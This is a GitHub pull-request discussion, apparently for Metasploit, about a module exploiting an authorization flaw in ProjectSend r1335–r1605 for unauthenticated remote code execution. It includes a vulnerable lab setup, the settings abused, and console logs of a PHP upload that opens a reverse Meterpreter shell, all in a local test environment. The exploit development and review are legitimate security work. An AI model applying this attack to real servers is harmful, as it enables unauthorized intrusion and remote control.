ProjectSend r1335 - r1605 RCE module

[ostrichgolf]

This PR is a duplicate of #19433, however this comes from a unique branch as instructed by @jheysel-r7.

Original PR message added for clarity:

This pull request adds a new exploit module targeting ProjectSend versions r1335 through r1605.

The module exploits an improper authorization vulnerability, allowing unauthenticated RCE by manipulating the application's configuration settings.

This exploit is largely based on the advisory by Synacktiv, which can be found here.

For the exploit to work, it is necessary to enable client registration, allow all users to upload files, and enable automatic approval of new clients. Since these settings are unknown prior to or during exploitation, the module provides an option to reset them to their default secure state after exploitation, as a more secure alternative.

Verification steps

The following Docker Compose file can be used to set up a vulnerable environment:

---
    services:
      projectsend:
        image: lscr.io/linuxserver/projectsend:version-r1605
        container_name: projectsend
        environment:
          - PUID=1000
          - PGID=1000
          - TZ=Etc/UTC
          - MAX_UPLOAD=5000
        volumes:
          - ./projectsend/config:/config
          - ./projectsend/data:/data
        ports:
          - 80:80
        restart: unless-stopped
      db:
        image: mariadb
        restart: unless-stopped
        container_name: db
        volumes:
          - ./mariadb_data:/var/lib/mysql
        environment:
          MYSQL_ROOT_PASSWORD: password
          MYSQL_DATABASE: projectsend
          MYSQL_USER: projectsend
          MYSQL_PASSWORD: projectsend

After launching the containers, ProjectSend requires initial configuration, which can be completed by accessing port 80 on localhost.

The exploit has been tested and confirmed to work against the following versions:

• r1335
• r1415
• r1420
• r1584
• r1605

Known Issues

• Occasionally, authentication fails randomly across all tested versions. This issue has been observed during manual testing of the application as well, indicating that it is not related to the Metasploit module. The module currently informs the user if this issue occurs.
• The module currently attempts every possible payload URL. Is there a way to exit early if a shell is successfully obtained?

[dledda-r7]

Hello ostrichgolf, Thanks for your PR!
I've left couple of comments, question and improvement for the module along with some logs of the testing.

ProjectSend r1605 on Docker

msf6 exploit(linux/http/projectsend_unauth_rce) > set lhost 172.17.0.1
lhost => 172.17.0.1
msf6 exploit(linux/http/projectsend_unauth_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/http/projectsend_unauth_rce) > set rport 8080
rport => 8080
msf6 exploit(linux/http/projectsend_unauth_rce) > exploit

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Client registration successfully enabled
[+] User troy_okeefe created with password fiuYFr22
[*] Disabling upload restrictions...
[*] Logging in as troy_okeefe...
[-] Exploit aborted due to failure: no-access: Failed to authenticate. This can happen, you should try to execute the exploit again
[+] Client registration successfully disabled
[*] Enabling upload restrictions...
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/projectsend_unauth_rce) > exploit

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Client registration successfully enabled
[+] User alphonse created with password vBbTZFYI
[*] Disabling upload restrictions...
[*] Logging in as alphonse...
[+] Logged in as alphonse
[+] Successfully uploaded PHP file: fw9G20My.php
[*] Sending stage (39927 bytes) to 172.19.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.19.0.2:59904) at 2024-10-07 07:38:40 -0400
[*] Logging in as alphonse...
[+] Logged in as alphonse
[+] Client registration successfully disabled
[*] Enabling upload restrictions...

meterpreter > sysinfo
Computer    : fe50101fbbdc
OS          : Linux fe50101fbbdc 6.10.9-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.10.9-1kali1 (2024-09-09) x86_64
Meterpreter : php/linux
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(linux/http/projectsend_unauth_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > exit
[*] Shutting down session: 1

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
msf6 

[ostrichgolf]

@jheysel-r7 / @dledda-r7 : Is there anything you need from me to move this toward merging?

[jheysel-r7]

Hey @ostrichgolf there's a couple more changes that need to be made, mostly regarding the need for the check method to return a CheckCode. Otherwise the modules looking great. Let me know if you have any questions. Cheers.

[jheysel-r7]

As mentioned earlier - the check method must always return a CheckCode, instead of calling fail_with here we should return CheckCode::Unknown

Suggested change

	unless res
	fail_with(Failure::NoAccess, 'Failed to connect to the provided URL')
	end
	return CheckCode::Unknown('Failed to connect to the provided URL') unless res